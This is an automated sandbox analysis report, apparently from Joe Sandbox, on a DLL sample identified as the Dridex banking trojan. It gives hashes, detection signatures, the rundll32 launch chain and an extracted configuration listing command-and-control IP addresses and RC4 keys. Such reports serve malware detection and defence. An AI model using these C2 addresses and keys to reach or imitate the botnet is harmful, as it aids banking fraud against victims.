Loading ...

Play interactive tourEdit tour

Analysis Report 1c640454_by_Libranalysis

Overview

General Information

Sample Name:1c640454_by_Libranalysis (renamed file extension from none to dll)
Analysis ID:413038
MD5:1c640454d82c630e74949cffb0d70e89
SHA1:c7603c8cbf7c41a5aea125e8030b9c37f81bf285
SHA256:610b286c27968d72cd8ecd910dbe47ec37d359d60349d2a79a0420595a14ce98
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 1404 cmdline: loaddll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 4536 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5056 cmdline: rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 764 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["43.229.206.212:443", "82.209.17.209:8172", "162.241.209.225:4125"], "RC4 keys": ["16dkGStOzdHgjuCciXGdSX7UrHWfYSUG8wEUtKNgzHrWMfTGafJbC", "39t3NdDhurvpltFNCpvA5goSylkxjIBtIwWPTv1DPbNEcuIekQC7O"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.326422259.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    2.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 2.2.rundll32.exe.10000000.3.unpackMalware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["43.229.206.212:443", "82.209.17.209:8172", "162.241.209.225:4125"], "RC4 keys": ["16dkGStOzdHgjuCciXGdSX7UrHWfYSUG8wEUtKNgzHrWMfTGafJbC", "39t3NdDhurvpltFNCpvA5goSylkxjIBtIwWPTv1DPbNEcuIekQC7O"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 1c640454_by_Libranalysis.dllReversingLabs: Detection: 29%
      Machine Learning detection for sampleShow sources
      Source: 1c640454_by_Libranalysis.dllJoe Sandbox ML: detected
      Source: 1c640454_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: 1c640454_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: ClusApi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.304358331.0000000005136000.00000004.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb 5 source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: imagehlp.pdb5" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: wimm32.pdb'" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb)" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: sfc.pdb_H_ source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdbk source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: mpr.pdb\IW source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: fpmvppp.pdb source: loaddll32.exe, 00000000.00000002.231118636.0000000010025000.00000002.00020000.sdmp, 1c640454_by_Libranalysis.dll
      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: advapi32.pdb3" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb?" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb65 source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorIPs: 43.229.206.212:443
      Source: Malware configuration extractorIPs: 82.209.17.209:8172
      Source: Malware configuration extractorIPs: 162.241.209.225:4125
      Source: Joe Sandbox ViewIP Address: 82.209.17.209 82.209.17.209
      Source: Joe Sandbox ViewIP Address: 162.241.209.225 162.241.209.225
      Source: Joe Sandbox ViewIP Address: 43.229.206.212 43.229.206.212
      Source: Joe Sandbox ViewASN Name: PODA-ASCZ PODA-ASCZ
      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: Joe Sandbox ViewASN Name: INET-AS-IDPTInetGlobalIndoID INET-AS-IDPTInetGlobalIndoID

      E-Banking Fraud:

      barindex
      Yara detected Dridex unpacked fileShow sources
      Source: Yara matchFile source: 00000002.00000002.326422259.0000000010001000.00000020.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100220F00_2_100220F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100114602_2_10011460
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000846C2_2_1000846C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100014942_2_10001494
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000A52C2_2_1000A52C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10011D582_2_10011D58
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100193482_2_10019348
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100107542_2_10010754
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100090CC2_2_100090CC
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 764
      Source: 1c640454_by_Libranalysis.dllBinary or memory string: OriginalFilenamex2otfb.dllN vs 1c640454_by_Libranalysis.dll
      Source: 1c640454_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: 1c640454_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal72.troj.winDLL@6/4@0/4
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5056
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7CB.tmpJump to behavior
      Source: 1c640454_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1
      Source: 1c640454_by_Libranalysis.dllReversingLabs: Detection: 29%
      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll'
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 764
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1c640454_by_Libranalysis.dll',#1Jump to behavior
      Source: 1c640454_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
      Source: 1c640454_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ClusApi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.304358331.0000000005136000.00000004.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb 5 source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: imagehlp.pdb5" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: wimm32.pdb'" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb)" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: sfc.pdb_H_ source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdbk source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: mpr.pdb\IW source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: fpmvppp.pdb source: loaddll32.exe, 00000000.00000002.231118636.0000000010025000.00000002.00020000.sdmp, 1c640454_by_Libranalysis.dll
      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: advapi32.pdb3" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb?" source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.307631255.0000000005650000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb65 source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.307636527.0000000005656000.00000004.00000040.sdmp
      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.307620266.0000000005681000.00000004.00000001.sdmp
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006207 push ebx; ret 0_2_10006208
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10004E0F push 822377FAh; iretd 0_2_10004E14
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10005813 push eax; ret 0_2_1000590D
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006830 push 82235DBAh; iretd 0_2_10006855
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002C33 push 0E950FD0h; iretd 0_2_10002D7C
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000585A push eax; ret 0_2_1000590D
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10005A7B push cs; iretd 0_2_10005B7E
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006A80 push ebx; iretd 0_2_10006A85
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002C8E push 0E950FD0h; iretd 0_2_10002D7C
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000388E push 8223930Ah; iretd 0_2_10003893
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100048AF push 8223A1AEh; iretd 0_2_100048B4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100066D0 push 8223737Ah; iretd 0_2_100066D5
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100054EF push 822385B2h; iretd 0_2_100054F4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000530F push 82230D7Eh; iretd 0_2_10005314
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000574F push 82238352h; iretd 0_2_10005754
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100037A2 push cs; retf 0_2_100037DC
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100039C3 push edi; retf 0_2_100039C4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10005FD6 push 0E950020h; retf 0_2_10005FDE
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002DF3 push cs; iretd 0_2_10002E7C
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100037F5 push cs; retf 0_2_100037DC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000F6CC push esi; mov dword ptr [esp], 00000000h2_2_1000F6CD
      Source: initial sampleStatic PE information: section name: .text entropy: 7.53078515147
      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: WerFault.exe, 0000000F.00000002.323639080.0000000005770000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: WerFault.exe, 0000000F.00000003.321065684.000000000504C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: WerFault.exe, 0000000F.00000003.321065684.000000000504C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWk6
      Source: WerFault.exe, 0000000F.00000002.323639080.0000000005770000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
